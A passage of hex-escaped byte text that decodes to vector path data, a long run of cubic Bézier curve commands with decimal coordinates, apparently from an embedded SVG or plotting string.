\x38\x20\x31\x30\x2e\x36\x35\x31\x39\x33\x34\x34\x35\x31\x38\x20\
\x31\x31\x2e\x32\x32\x39\x37\x35\x33\x32\x30\x32\x37\x20\x31\x30\
\x2e\x36\x31\x35\x30\x32\x31\x36\x36\x39\x35\x20\x43\x20\x31\x31\
\x2e\x32\x33\x35\x39\x39\x34\x32\x37\x31\x35\x20\x31\x30\x2e\x35\
\x37\x38\x31\x30\x38\x38\x38\x37\x32\x20\x31\x31\x2e\x32\x34\x32\
\x32\x33\x35\x33\x34\x30\x33\x20\x31\x30\x2e\x35\x34\x31\x35\x39\
\x33\x32\x30\x33\x36\x20\x31\x31\x2e\x32\x34\x38\x34\x37\x36\x34\
\x30\x39\x32\x20\x31\x30\x2e\x35\x30\x35\x35\x30\x30\x33\x37\x39\
\x35\x20\x43\x20\x31\x31\x2e\x32\x35\x34\x37\x31\x37\x34\x37\x38\
\x20\x31\x30\x2e\x34\x36\x39\x34\x30\x37\x35\x35\x35\x35\x20\x31\
\x31\x2e\x32\x36\x30\x39\x35\x38\x35\x34\x36\x38\x20\x31\x30\x2e\
\x34\x33\x33\x37\x34\x30\x31\x33\x37\x34\x20\x31\x31\x2e\x32\x36\
\x37\x31\x39\x39\x36\x31\x35\x37\x20\x31\x30\x2e\x33\x39\x38\x35\
\x32\x33\x30\x36\x33\x35\x20\x43\x20\x31\x31\x2e\x32\x37\x33\x34\
\x34\x30\x36\x38\x34\x35\x20\x31\x30\x2e\x33\x36\x33\x33\x30\x35\
\x39\x38\x39\x35\x20\x31\x31\x2e\x32\x37\x39\x36\x38\x31\x37\x35\
\x33\x33\x20\x31\x30\x2e\x33\x32\x38\x35\x34\x31\x39\x37\x31\x34\
\x20\x31\x31\x2e\x32\x38\x35\x39\x32\x32\x38\x32\x32\x32\x20\x31\
\x30\x2e\x32\x39\x34\x32\x35\x35\x30\x38\x35\x37\x20\x43\x20\x31\
\x31\x2e\x32\x39\x32\x31\x36\x33\x38\x39\x31\x20\x31\x30\x2e\x32\
\x35\x39\x39\x36\x38\x32\x20\x31\x31\x2e\x32\x39\x38\x34\x30\x34\
\x39\x35\x39\x38\x20\x31\x30\x2e\x32\x32\x36\x31\x36\x31\x33\x31\
\x39\x36\x20\x31\x31\x2e\x33\x30\x34\x36\x34\x36\x30\x32\x38\x37\
\x20\x31\x30\x2e\x31\x39\x32\x38\x35\x37\x36\x32\x32\x35\x20\x43\
\x20\x31\x31\x2e\x33\x31\x30\x38\x38\x37\x30\x39\x37\x35\x20\x31\
\x30\x2e\x31\x35\x39\x35\x35\x33\x39\x32\x35\x34\x20\x31\x31\x2e\
\x33\x31\x37\x31\x32\x38\x31\x36\x36\x34\x20\x31\x30\x2e\x31\x32\
\x36\x37\x35\x36\x34\x34\x31\x20\x31\x31\x2e\x33\x32\x33\x33\x36\
\x39\x32\x33\x35\x32\x20\x31\x30\x2e\x30\x39\x34\x34\x38\x37\x34\
\x31\x33\x20\x43\x20\x31\x31\x2e\x33\x32\x39\x36\x31\x30\x33\x30\
\x34\x20\x31\x30\x2e\x30\x36\x32\x32\x31\x38\x33\x38\x34\x39\x20\
\x31\x31\x2e\x33\x33\x35\x38\x35\x31\x33\x37\x32\x39\x20\x31\x30\
\x2e\x30\x33\x30\x34\x38\x30\x39\x39\x34\x36\x20\x31\x31\x2e\x33\
\x34\x32\x30\x39\x32\x34\x34\x31\x37\x20\x39\x2e\x39\x39\x39\x32\
\x39\x36\x35\x31\x36\x36\x39\x20\x43\x20\x31\x31\x2e\x33\x34\x38\
\x33\x33\x33\x35\x31\x30\x35\x20\x39\x2e\x39\x36\x38\x31\x31\x32\
\x30\x33\x38\x38\x20\x31\x31\x2e\x33\x35\x34\x35\x37\x34\x35\x37\
\x39\x34\x20\x39\x2e\x39\x33\x37\x34\x38\x33\x38\x30\x31\x38\x32\
\x20\x31\x31\x2e\x33\x36\x30\x38\x31\x35\x36\x34\x38\x32\x20\x39\
\x2e\x39\x30\x37\x34\x33\x32\x30\x37\x38\x37\x33\x20\x43\x20\x31\
\x31\x2e\x33\x36\x37\x30\x35\x36\x37\x31\x37\x20\x39\x2e\x38\x37\
\x37\x33\x38\x30\x33\x35\x35\x36\x34\x20\x31\x31\x2e\x33\x37\x33\
\x32\x39\x37\x37\x38\x35\x39\x20\x39\x2e\x38\x34\x37\x39\x30\x38\
\x36\x31\x36\x38\x20\x31\x31\x2e\x33\x37\x39\x35\x33\x38\x38\x35\
\x34\x37\x20\x39\x2e\x38\x31\x39\x30\x33\x36\x31\x30\x32\x31\x32\
\x20\x43\x20\x31\x31\x2e\x33\x38\x35\x37\x37\x39\x39\x32\x33\x36\
\x20\x39\x2e\x37\x39\x30\x31\x36\x33\x35\x38\x37\x34\x35\x20\x31\
\x31\x2e\x33\x39\x32\x30\x32\x30\x39\x39\x32\x34\x20\x39\x2e\x37\
\x36\x31\x38\x39\x33\x39\x30\x33\x38\x34\x20\x31\x31\x2e\x33\x39\
\x38\x32\x36\x32\x30\x36\x31\x32\x20\x39\x2e\x37\x33\x34\x32\x34\
\x35\x32\x32\x38\x34\x31\x20\x43\x20\x31\x31\x2e\x34\x30\x34\x35\
\x30\x33\x31\x33\x30\x31\x20\x39\x2e\x37\x30\x36\x35\x39\x36\x35\
\x35\x32\x39\x38\x20\x31\x31\x2e\x34\x31\x30\x37\x34\x34\x31\x39\
\x38\x39\x20\x39\x2e\x36\x37\x39\x35\x37\x32\x36\x32\x33\x35\x37\
\x20\x31\x31\x2e\x34\x31\x36\x39\x38\x35\x32\x36\x37\x37\x20\x39\
\x2e\x36\x35\x33\x31\x39\x30\x35\x32\x36\x33\x39\x20\x43\x20\x31\
\x31\x2e\x34\x32\x33\x32\x32\x36\x33\x33\x36\x36\x20\x39\x2e\x36\
\x32\x36\x38\x30\x38\x34\x32\x39\x32\x32\x20\x31\x31\x2e\x34\x32\
\x39\x34\x36\x37\x34\x30\x35\x34\x20\x39\x2e\x36\x30\x31\x30\x37\
\x32\x30\x32\x37\x33\x31\x20\x31\x31\x2e\x34\x33\x35\x37\x30\x38\
\x34\x37\x34\x32\x20\x39\x2e\x35\x37\x35\x39\x39\x37\x32\x38\x39\
\x35\x35\x20\x43\x20\x31\x31\x2e\x34\x34\x31\x39\x34\x39\x35\x34\
\x33\x31\x20\x39\x2e\x35\x35\x30\x39\x32\x32\x35\x35\x31\x37\x39\
\x20\x31\x31\x2e\x34\x34\x38\x31\x39\x30\x36\x31\x31\x39\x20\x39\
\x2e\x35\x32\x36\x35\x31\x33\x34\x36\x30\x34\x32\x20\x31\x31\x2e\
\x34\x35\x34\x34\x33\x31\x36\x38\x30\x38\x20\x39\x2e\x35\x30\x32\
\x37\x38\x34\x38\x34\x32\x33\x34\x20\x43\x20\x31\x31\x2e\x34\x36\
\x30\x36\x37\x32\x37\x34\x39\x36\x20\x39\x2e\x34\x37\x39\x30\x35\
\x36\x32\x32\x34\x32\x35\x20\x31\x31\x2e\x34\x36\x36\x39\x31\x33\
\x38\x31\x38\x34\x20\x39\x2e\x34\x35\x36\x30\x31\x32\x31\x37\x34\
\x37\x34\x20\x31\x31\x2e\x34\x37\x33\x31\x35\x34\x38\x38\x37\x33\
\x20\x39\x2e\x34\x33\x33\x36\x36\x36\x33\x35\x35\x37\x36\x20\x43\
\x20\x31\x31\x2e\x34\x37\x39\x33\x39\x35\x39\x35\x36\x31\x20\x39\
\x2e\x34\x31\x31\x33\x32\x30\x35\x33\x36\x37\x39\x20\x31\x31\x2e\
\x34\x38\x35\x36\x33\x37\x30\x32\x34\x39\x20\x39\x2e\x33\x38\x39\
\x36\x37\x37\x31\x35\x30\x33\x36\x20\x31\x31\x2e\x34\x39\x31\x38\
\x37\x38\x30\x39\x33\x38\x20\x39\x2e\x33\x36\x38\x37\x34\x38\x36\
\x37\x32\x34\x32\x20\x43\x20\x31\x31\x2e\x34\x39\x38\x31\x31\x39\
\x31\x36\x32\x36\x20\x39\x2e\x33\x34\x37\x38\x32\x30\x31\x39\x34\
\x34\x38\x20\x31\x31\x2e\x35\x30\x34\x33\x36\x30\x32\x33\x31\x34\
\x20\x39\x2e\x33\x32\x37\x36\x31\x30\x39\x32\x37\x32\x36\x20\x31\
\x31\x2e\x35\x31\x30\x36\x30\x31\x33\x30\x30\x33\x20\x39\x2e\x33\
\x30\x38\x31\x33\x32\x31\x34\x31\x33\x37\x20\x43\x20\x31\x31\x2e\
\x35\x31\x36\x38\x34\x32\x33\x36\x39\x31\x20\x39\x2e\x32\x38\x38\
\x36\x35\x33\x33\x35\x35\x34\x37\x20\x31\x31\x2e\x35\x32\x33\x30\
\x38\x33\x34\x33\x37\x39\x20\x39\x2e\x32\x36\x39\x39\x30\x39\x34\
\x34\x36\x37\x32\x20\x31\x31\x2e\x35\x32\x39\x33\x32\x34\x35\x30\
\x36\x38\x20\x39\x2e\x32\x35\x31\x39\x31\x30\x34\x36\x32\x39\x37\
\x20\x43\x20\x31\x31\x2e\x35\x33\x35\x35\x36\x35\x35\x37\x35\x36\
\x20\x39\x2e\x32\x33\x33\x39\x31\x31\x34\x37\x39\x32\x31\x20\x31\
\x31\x2e\x35\x34\x31\x38\x30\x36\x36\x34\x34\x35\x20\x39\x2e\x32\
\x31\x36\x36\x36\x31\x39\x30\x33\x30\x35\x20\x31\x31\x2e\x35\x34\
\x38\x30\x34\x37\x37\x31\x33\x33\x20\x39\x2e\x32\x30\x30\x31\x37\
\x30\x35\x34\x34\x30\x37\x20\x43\x20\x31\x31\x2e\x35\x35\x34\x32\
\x38\x38\x37\x38\x32\x31\x20\x39\x2e\x31\x38\x33\x36\x37\x39\x31\
\x38\x35\x31\x20\x31\x31\x2e\x35\x36\x30\x35\x32\x39\x38\x35\x31\
\x20\x39\x2e\x31\x36\x37\x39\x35\x30\x36\x30\x35\x37\x34\x20\x31\
\x31\x2e\x35\x36\x36\x37\x37\x30\x39\x31\x39\x38\x20\x39\x2e\x31\
\x35\x32\x39\x39\x32\x33\x36\x33\x37\x20\x43\x20\x31\x31\x2e\x35\
\x37\x33\x30\x31\x31\x39\x38\x38\x36\x20\x39\x2e\x31\x33\x38\x30\
\x33\x34\x31\x32\x31\x36\x35\x20\x31\x31\x2e\x35\x37\x39\x32\x35\
\x33\x30\x35\x37\x35\x20\x39\x2e\x31\x32\x33\x38\x35\x30\x38\x35\
\x32\x31\x36\x20\x31\x31\x2e\x35\x38\x35\x34\x39\x34\x31\x32\x36\
\x33\x20\x39\x2e\x31\x31\x30\x34\x34\x38\x38\x34\x39\x33\x35\x20\
\x43\x20\x31\x31\x2e\x35\x39\x31\x37\x33\x35\x31\x39\x35\x31\x20\
\x39\x2e\x30\x39\x37\x30\x34\x36\x38\x34\x36\x35\x33\x20\x31\x31\
\x2e\x35\x39\x37\x39\x37\x36\x32\x36\x34\x20\x39\x2e\x30\x38\x34\
\x34\x33\x30\x38\x31\x31\x32\x35\x20\x31\x31\x2e\x36\x30\x34\x32\
\x31\x37\x33\x33\x32\x38\x20\x39\x2e\x30\x37\x32\x36\x30\x35\x37\
\x36\x34\x33\x32\x20\x43\x20\x31\x31\x2e\x36\x31\x30\x34\x35\x38\
\x34\x30\x31\x37\x20\x39\x2e\x30\x36\x30\x37\x38\x30\x37\x31\x37\
\x34\x20\x31\x31\x2e\x36\x31\x36\x36\x39\x39\x34\x37\x30\x35\x20\
\x39\x2e\x30\x34\x39\x37\x35\x31\x34\x31\x38\x30\x36\x20\x31\x31\
\x2e\x36\x32\x32\x39\x34\x30\x35\x33\x39\x33\x20\x39\x2e\x30\x33\
\x39\x35\x32\x31\x36\x30\x36\x30\x36\x20\x43\x20\x31\x31\x2e\x36\
\x32\x39\x31\x38\x31\x36\x30\x38\x32\x20\x39\x2e\x30\x32\x39\x32\
\x39\x31\x37\x39\x34\x30\x35\x20\x31\x31\x2e\x36\x33\x35\x34\x32\
\x32\x36\x37\x37\x20\x39\x2e\x30\x31\x39\x38\x36\x36\x32\x37\x39\
\x36\x33\x20\x31\x31\x2e\x36\x34\x31\x36\x36\x33\x37\x34\x35\x38\
\x20\x39\x2e\x30\x31\x31\x32\x34\x37\x35\x31\x35\x36\x38\x20\x43\
\x20\x31\x31\x2e\x36\x34\x37\x39\x30\x34\x38\x31\x34\x37\x20\x39\
\x2e\x30\x30\x32\x36\x32\x38\x37\x35\x31\x37\x33\x20\x31\x31\x2e\
\x36\x35\x34\x31\x34\x35\x38\x38\x33\x35\x20\x38\x2e\x39\x39\x34\
\x38\x32\x31\x35\x39\x32\x30\x37\x20\x31\x31\x2e\x36\x36\x30\x33\
\x38\x36\x39\x35\x32\x33\x20\x38\x2e\x39\x38\x37\x38\x32\x37\x31\
\x39\x38\x39\x37\x20\x43\x20\x31\x31\x2e\x36\x36\x36\x36\x32\x38\
\x30\x32\x31\x32\x20\x38\x2e\x39\x38\x30\x38\x33\x32\x38\x30\x35\
\x38\x36\x20\x31\x31\x2e\x36\x37\x32\x38\x36\x39\x30\x39\x20\x38\
\x2e\x39\x37\x34\x36\x35\x36\x30\x36\x39\x32\x20\x31\x31\x2e\x36\
\x37\x39\x31\x31\x30\x31\x35\x38\x38\x20\x38\x2e\x39\x36\x39\x32\
\x39\x36\x38\x35\x38\x37\x39\x20\x43\x20\x31\x31\x2e\x36\x38\x35\
\x33\x35\x31\x32\x32\x37\x37\x20\x38\x2e\x39\x36\x33\x39\x33\x37\
\x36\x34\x38\x33\x39\x20\x31\x31\x2e\x36\x39\x31\x35\x39\x32\x32\
\x39\x36\x35\x20\x38\x2e\x39\x35\x39\x34\x30\x30\x38\x38\x32\x36\
\x35\x20\x31\x31\x2e\x36\x39\x37\x38\x33\x33\x33\x36\x35\x34\x20\
\x38\x2e\x39\x35\x35\x36\x38\x35\x31\x33\x39\x31\x35\x20\x43\x20\
\x31\x31\x2e\x37\x30\x34\x30\x37\x34\x34\x33\x34\x32\x20\x38\x2e\
\x39\x35\x31\x39\x36\x39\x33\x39\x35\x36\x35\x20\x31\x31\x2e\x37\
\x31\x30\x33\x31\x35\x35\x30\x33\x20\x38\x2e\x39\x34\x39\x30\x37\
\x39\x36\x31\x33\x37\x32\x20\x31\x31\x2e\x37\x31\x36\x35\x35\x36\
\x35\x37\x31\x39\x20\x38\x2e\x39\x34\x37\x30\x31\x33\x30\x38\x30\
\x38\x39\x20\x43\x20\x31\x31\x2e\x37\x32\x32\x37\x39\x37\x36\x34\
\x30\x37\x20\x38\x2e\x39\x34\x34\x39\x34\x36\x35\x34\x38\x30\x36\
\x20\x31\x31\x2e\x37\x32\x39\x30\x33\x38\x37\x30\x39\x35\x20\x38\
\x2e\x39\x34\x33\x37\x30\x38\x32\x31\x36\x39\x33\x20\x31\x31\x2e\
\x37\x33\x35\x32\x37\x39\x37\x37\x38\x34\x20\x38\x2e\x39\x34\x33\
\x32\x39\x34\x30\x38\x39\x31\x38\x20\x43\x20\x31\x31\x2e\x37\x34\
\x31\x35\x32\x30\x38\x34\x37\x32\x20\x38\x2e\x39\x34\x32\x38\x37\
\x39\x39\x36\x31\x34\x34\x20\x31\x31\x2e\x37\x34\x37\x37\x36\x31\
\x39\x31\x36\x20\x38\x2e\x39\x34\x33\x32\x39\x34\x39\x39\x35\x33\
\x31\x20\x31\x31\x2e\x37\x35\x34\x30\x30\x32\x39\x38\x34\x39\x20\
\x38\x2e\x39\x34\x34\x35\x33\x33\x39\x31\x32\x38\x31\x20\x43\x20\
\x31\x31\x2e\x37\x36\x30\x32\x34\x34\x30\x35\x33\x37\x20\x38\x2e\
\x39\x34\x35\x37\x37\x32\x38\x33\x30\x33\x31\x20\x31\x31\x2e\x37\
\x36\x36\x34\x38\x35\x31\x32\x32\x36\x20\x38\x2e\x39\x34\x37\x38\
\x34\x30\x35\x38\x37\x36\x32\x20\x31\x31\x2e\x37\x37\x32\x37\x32\
\x36\x31\x39\x31\x34\x20\x38\x2e\x39\x35\x30\x37\x33\x30\x36\x33\
\x35\x32\x36\x20\x43\x20\x31\x31\x2e\x37\x37\x38\x39\x36\x37\x32\
\x36\x30\x32\x20\x38\x2e\x39\x35\x33\x36\x32\x30\x36\x38\x32\x39\
\x20\x31\x31\x2e\x37\x38\x35\x32\x30\x38\x33\x32\x39\x31\x20\x38\
\x2e\x39\x35\x37\x33\x33\x37\x39\x36\x37\x33\x34\x20\x31\x31\x2e\
\x37\x39\x31\x34\x34\x39\x33\x39\x37\x39\x20\x38\x2e\x39\x36\x31\
\x38\x37\x34\x36\x37\x37\x37\x31\x20\x43\x20\x31\x31\x2e\x37\x39\
\x37\x36\x39\x30\x34\x36\x36\x37\x20\x38\x2e\x39\x36\x36\x34\x31\
\x31\x33\x38\x38\x30\x39\x20\x31\x31\x2e\x38\x30\x33\x39\x33\x31\
\x35\x33\x35\x36\x20\x38\x2e\x39\x37\x31\x37\x37\x32\x34\x35\x33\
\x35\x31\x20\x31\x31\x2e\x38\x31\x30\x31\x37\x32\x36\x30\x34\x34\
\x20\x38\x2e\x39\x37\x37\x39\x34\x38\x38\x31\x33\x38\x33\x20\x43\
\x20\x31\x31\x2e\x38\x31\x36\x34\x31\x33\x36\x37\x33\x32\x20\x38\
\x2e\x39\x38\x34\x31\x32\x35\x31\x37\x34\x31\x34\x20\x31\x31\x2e\
\x38\x32\x32\x36\x35\x34\x37\x34\x32\x31\x20\x38\x2e\x39\x39\x31\
\x31\x32\x31\x37\x33\x33\x34\x37\x20\x31\x31\x2e\x38\x32\x38\x38\
\x39\x35\x38\x31\x30\x39\x20\x38\x2e\x39\x39\x38\x39\x32\x38\x31\
\x39\x36\x33\x37\x20\x43\x20\x31\x31\x2e\x38\x33\x35\x31\x33\x36\
\x38\x37\x39\x37\x20\x39\x2e\x30\x30\x36\x37\x33\x34\x36\x35\x39\
\x32\x37\x20\x31\x31\x2e\x38\x34\x31\x33\x37\x37\x39\x34\x38\x36\
\x20\x39\x2e\x30\x31\x35\x33\x35\x35\x38\x39\x37\x33\x32\x20\x31\
\x31\x2e\x38\x34\x37\x36\x31\x39\x30\x31\x37\x34\x20\x39\x2e\x30\
\x32\x34\x37\x38\x30\x33\x39\x35\x36\x36\x20\x43\x20\x31\x31\x2e\
\x38\x35\x33\x38\x36\x30\x30\x38\x36\x33\x20\x39\x2e\x30\x33\x34\
\x32\x30\x34\x38\x39\x34\x20\x31\x31\x2e\x38\x36\x30\x31\x30\x31\
\x31\x35\x35\x31\x20\x39\x2e\x30\x34\x34\x34\x33\x37\x34\x38\x34\
\x31\x33\x20\x31\x31\x2e\x38\x36\x36\x33\x34\x32\x32\x32\x33\x39\
\x20\x39\x2e\x30\x35\x35\x34\x36\x35\x34\x34\x39\x36\x33\x20\x43\
\x20\x31\x31\x2e\x38\x37\x32\x35\x38\x33\x32\x39\x32\x38\x20\x39\
\x2e\x30\x36\x36\x34\x39\x33\x34\x31\x35\x31\x33\x20\x31\x31\x2e\
\x38\x37\x38\x38\x32\x34\x33\x36\x31\x36\x20\x39\x2e\x30\x37\x38\
\x33\x32\x31\x35\x33\x39\x39\x33\x20\x31\x31\x2e\x38\x38\x35\x30\
\x36\x35\x34\x33\x30\x34\x20\x39\x2e\x30\x39\x30\x39\x33\x35\x39\
\x32\x35\x36\x37\x20\x43\x20\x31\x31\x2e\x38\x39\x31\x33\x30\x36\
\x34\x39\x39\x33\x20\x39\x2e\x31\x30\x33\x35\x35\x30\x33\x31\x31\
\x34\x31\x20\x31\x31\x2e\x38\x39\x37\x35\x34\x37\x35\x36\x38\x31\
\x20\x39\x2e\x31\x31\x36\x39\x35\x35\x36\x38\x37\x30\x39\x20\x31\
\x31\x2e\x39\x30\x33\x37\x38\x38\x36\x33\x36\x39\x20\x39\x2e\x31\
\x33\x31\x31\x33\x36\x39\x39\x33\x39\x20\x43\x20\x31\x31\x2e\x39\
\x31\x30\x30\x32\x39\x37\x30\x35\x38\x20\x39\x2e\x31\x34\x35\x33\
\x31\x38\x33\x30\x30\x37\x31\x20\x31\x31\x2e\x39\x31\x36\x32\x37\
\x30\x37\x37\x34\x36\x20\x39\x2e\x31\x36\x30\x32\x38\x30\x32\x30\
\x35\x33\x39\x20\x31\x31\x2e\x39\x32\x32\x35\x31\x31\x38\x34\x33\
\x35\x20\x39\x2e\x31\x37\x36\x30\x30\x36\x35\x31\x31\x39\x36\x20\
\x43\x20\x31\x31\x2e\x39\x32\x38\x37\x35\x32\x39\x31\x32\x33\x20\
\x39\x2e\x31\x39\x31\x37\x33\x32\x38\x31\x38\x35\x32\x20\x31\x31\
\x2e\x39\x33\x34\x39\x39\x33\x39\x38\x31\x31\x20\x39\x2e\x32\x30\
\x38\x32\x32\x38\x31\x32\x34\x32\x35\x20\x31\x31\x2e\x39\x34\x31\
\x32\x33\x35\x30\x35\x20\x39\x2e\x32\x32\x35\x34\x37\x35\x31\x32\
\x31\x30\x32\x20\x43\x20\x31\x31\x2e\x39\x34\x37\x34\x37\x36\x31\
\x31\x38\x38\x20\x39\x2e\x32\x34\x32\x37\x32\x32\x31\x31\x37\x37\
\x39\x20\x31\x31\x2e\x39\x35\x33\x37\x31\x37\x31\x38\x37\x36\x20\
\x39\x2e\x32\x36\x30\x37\x32\x35\x33\x32\x36\x33\x20\x31\x31\x2e\
\x39\x35\x39\x39\x35\x38\x32\x35\x36\x35\x20\x39\x2e\x32\x37\x39\
\x34\x36\x36\x33\x35\x33\x30\x36\x20\x43\x20\x31\x31\x2e\x39\x36\
\x36\x31\x39\x39\x33\x32\x35\x33\x20\x39\x2e\x32\x39\x38\x32\x30\
\x37\x33\x37\x39\x38\x31\x20\x31\x31\x2e\x39\x37\x32\x34\x34\x30\
\x33\x39\x34\x31\x20\x39\x2e\x33\x31\x37\x36\x39\x30\x36\x36\x31\
\x39\x34\x20\x31\x31\x2e\x39\x37\x38\x36\x38\x31\x34\x36\x33\x20\
\x39\x2e\x33\x33\x37\x38\x39\x36\x37\x34\x39\x30\x31\x20\x43\x20\
\x31\x31\x2e\x39\x38\x34\x39\x32\x32\x35\x33\x31\x38\x20\x39\x2e\
\x33\x35\x38\x31\x30\x32\x38\x33\x36\x30\x38\x20\x31\x31\x2e\x39\
\x39\x31\x31\x36\x33\x36\x30\x30\x37\x20\x39\x2e\x33\x37\x39\x30\
\x33\x36\x30\x37\x34\x37\x38\x20\x31\x31\x2e\x39\x39\x37\x34\x30\
\x34\x36\x36\x39\x35\x20\x39\x2e\x34\x30\x30\x36\x37\x35\x39\x38\
\x37\x38\x31\x20\x43\x20\x31\x32\x2e\x30\x30\x33\x36\x34\x35\x37\
\x33\x38\x33\x20\x39\x2e\x34\x32\x32\x33\x31\x35\x39\x30\x30\x38\
\x34\x20\x31\x32\x2e\x30\x30\x39\x38\x38\x36\x38\x30\x37\x32\x20\
\x39\x2e\x34\x34\x34\x36\x36\x36\x37\x33\x37\x37\x35\x20\x31\x32\
\x2e\x30\x31\x36\x31\x32\x37\x38\x37\x36\x20\x39\x2e\x34\x36\x37\
\x37\x30\x37\x30\x32\x36\x20\x43\x20\x31\x32\x2e\x30\x32\x32\x33\
\x36\x38\x39\x34\x34\x38\x20\x39\x2e\x34\x39\x30\x37\x34\x37\x33\
\x31\x34\x32\x35\x20\x31\x32\x2e\x30\x32\x38\x36\x31\x30\x30\x31\
\x33\x37\x20\x39\x2e\x35\x31\x34\x34\x38\x31\x31\x39\x39\x36\x39\
\x20\x31\x32\x2e\x30\x33\x34\x38\x35\x31\x30\x38\x32\x35\x20\x39\
\x2e\x35\x33\x38\x38\x38\x36\x32\x34\x37\x37\x33\x20\x43\x20\x31\
\x32\x2e\x30\x34\x31\x30\x39\x32\x31\x35\x31\x33\x20\x39\x2e\x35\
\x36\x33\x32\x39\x31\x32\x39\x35\x37\x38\x20\x31\x32\x2e\x30\x34\
\x37\x33\x33\x33\x32\x32\x30\x32\x20\x39\x2e\x35\x38\x38\x33\x37\
\x31\x35\x34\x32\x31\x36\x20\x31\x32\x2e\x30\x35\x33\x35\x37\x34\
\x32\x38\x39\x20\x39\x2e\x36\x31\x34\x31\x30\x33\x36\x32\x34\x39\
\x34\x20\x43\x20\x31\x32\x2e\x30\x35\x39\x38\x31\x35\x33\x35\x37\
\x38\x20\x39\x2e\x36\x33\x39\x38\x33\x35\x37\x30\x37\x37\x32\x20\
\x31\x32\x2e\x30\x36\x36\x30\x35\x36\x34\x32\x36\x37\x20\x39\x2e\
\x36\x36\x36\x32\x32\x33\x35\x34\x36\x32\x38\x20\x31\x32\x2e\x30\
\x37\x32\x32\x39\x37\x34\x39\x35\x35\x20\x39\x2e\x36\x39\x33\x32\
\x34\x32\x38\x38\x37\x34\x32\x20\x43\x20\x31\x32\x2e\x30\x37\x38\
\x35\x33\x38\x35\x36\x34\x34\x20\x39\x2e\x37\x32\x30\x32\x36\x32\
\x32\x32\x38\x35\x37\x20\x31\x32\x2e\x30\x38\x34\x37\x37\x39\x36\
\x33\x33\x32\x20\x39\x2e\x37\x34\x37\x39\x31\x36\x38\x36\x39\x32\
\x37\x20\x31\x32\x2e\x30\x39\x31\x30\x32\x30\x37\x30\x32\x20\x39\
\x2e\x37\x37\x36\x31\x38\x31\x37\x30\x32\x35\x38\x20\x43\x20\x31\
\x32\x2e\x30\x39\x37\x32\x36\x31\x37\x37\x30\x39\x20\x39\x2e\x38\
\x30\x34\x34\x34\x36\x35\x33\x35\x38\x39\x20\x31\x32\x2e\x31\x30\
\x33\x35\x30\x32\x38\x33\x39\x37\x20\x39\x2e\x38\x33\x33\x33\x32\
\x35\x32\x33\x30\x34\x38\x20\x31\x32\x2e\x31\x30\x39\x37\x34\x33\
\x39\x30\x38\x35\x20\x39\x2e\x38\x36\x32\x37\x39\x31\x38\x36\x34\
\x34\x38\x20\x43\x20\x31\x32\x2e\x31\x31\x35\x39\x38\x34\x39\x37\
\x37\x34\x20\x39\x2e\x38\x39\x32\x32\x35\x38\x34\x39\x38\x34\x39\
\x20\x31\x32\x2e\x31\x32\x32\x32\x32\x36\x30\x34\x36\x32\x20\x39\
\x2e\x39\x32\x32\x33\x31\x36\x36\x30\x36\x36\x31\x20\x31\x32\x2e\
\x31\x32\x38\x34\x36\x37\x31\x31\x35\x20\x39\x2e\x39\x35\x32\x39\
\x33\x39\x34\x39\x32\x31\x20\x43\x20\x31\x32\x2e\x31\x33\x34\x37\
\x30\x38\x31\x38\x33\x39\x20\x39\x2e\x39\x38\x33\x35\x36\x32\x33\
\x37\x37\x36\x20\x31\x32\x2e\x31\x34\x30\x39\x34\x39\x32\x35\x32\
\x37\x20\x31\x30\x2e\x30\x31\x34\x37\x35\x33\x34\x33\x35\x37\x20\
\x31\x32\x2e\x31\x34\x37\x31\x39\x30\x33\x32\x31\x36\x20\x31\x30\
\x2e\x30\x34\x36\x34\x38\x35\x32\x33\x36\x32\x20\x43\x20\x31\x32\
\x2e\x31\x35\x33\x34\x33\x31\x33\x39\x30\x34\x20\x31\x30\x2e\x30\
\x37\x38\x32\x31\x37\x30\x33\x36\x37\x20\x31\x32\x2e\x31\x35\x39\
\x36\x37\x32\x34\x35\x39\x32\x20\x31\x30\x2e\x31\x31\x30\x34\x39\
\x32\x38\x33\x30\x31\x20\x31\x32\x2e\x31\x36\x35\x39\x31\x33\x35\
\x32\x38\x31\x20\x31\x30\x2e\x31\x34\x33\x32\x38\x34\x34\x39\x34\
\x38\x20\x43\x20\x31\x32\x2e\x31\x37\x32\x31\x35\x34\x35\x39\x36\
\x39\x20\x31\x30\x2e\x31\x37\x36\x30\x37\x36\x31\x35\x39\x36\x20\
\x31\x32\x2e\x31\x37\x38\x33\x39\x35\x36\x36\x35\x37\x20\x31\x30\
\x2e\x32\x30\x39\x33\x38\x36\x37\x39\x36\x36\x20\x31\x32\x2e\x31\
\x38\x34\x36\x33\x36\x37\x33\x34\x36\x20\x31\x30\x2e\x32\x34\x33\
\x31\x38\x37\x36\x33\x36\x37\x20\x43\x20\x31\x32\x2e\x31\x39\x30\
\x38\x37\x37\x38\x30\x33\x34\x20\x31\x30\x2e\x32\x37\x36\x39\x38\
\x38\x34\x37\x36\x38\x20\x31\x32\x2e\x31\x39\x37\x31\x31\x38\x38\
\x37\x32\x32\x20\x31\x30\x2e\x33\x31\x31\x32\x38\x32\x34\x36\x36\
\x33\x20\x31\x32\x2e\x32\x30\x33\x33\x35\x39\x39\x34\x31\x31\x20\
\x31\x30\x2e\x33\x34\x36\x30\x34\x30\x32\x33\x32\x37\x20\x43\x20\
\x31\x32\x2e\x32\x30\x39\x36\x30\x31\x30\x30\x39\x39\x20\x31\x30\
\x2e\x33\x38\x30\x37\x39\x37\x39\x39\x39\x31\x20\x31\x32\x2e\x32\
\x31\x35\x38\x34\x32\x30\x37\x38\x37\x20\x31\x30\x2e\x34\x31\x36\
\x30\x32\x32\x33\x32\x39\x37\x20\x31\x32\x2e\x32\x32\x32\x30\x38\
\x33\x31\x34\x37\x36\x20\x31\x30\x2e\x34\x35\x31\x36\x38\x33\x32\
\x39\x34\x33\x20\x43\x20\x31\x32\x2e\x32\x32\x38\x33\x32\x34\x32\
\x31\x36\x34\x20\x31\x30\x2e\x34\x38\x37\x33\x34\x34\x32\x35\x38\
\x38\x20\x31\x32\x2e\x32\x33\x34\x35\x36\x35\x32\x38\x35\x33\x20\
\x31\x30\x2e\x35\x32\x33\x34\x34\x34\x34\x38\x31\x33\x20\x31\x32\
\x2e\x32\x34\x30\x38\x30\x36\x33\x35\x34\x31\x20\x31\x30\x2e\x35\
\x35\x39\x39\x35\x33\x35\x31\x39\x37\x20\x43\x20\x31\x32\x2e\x32\
\x34\x37\x30\x34\x37\x34\x32\x32\x39\x20\x31\x30\x2e\x35\x39\x36\
\x34\x36\x32\x35\x35\x38\x31\x20\x31\x32\x2e\x32\x35\x33\x32\x38\
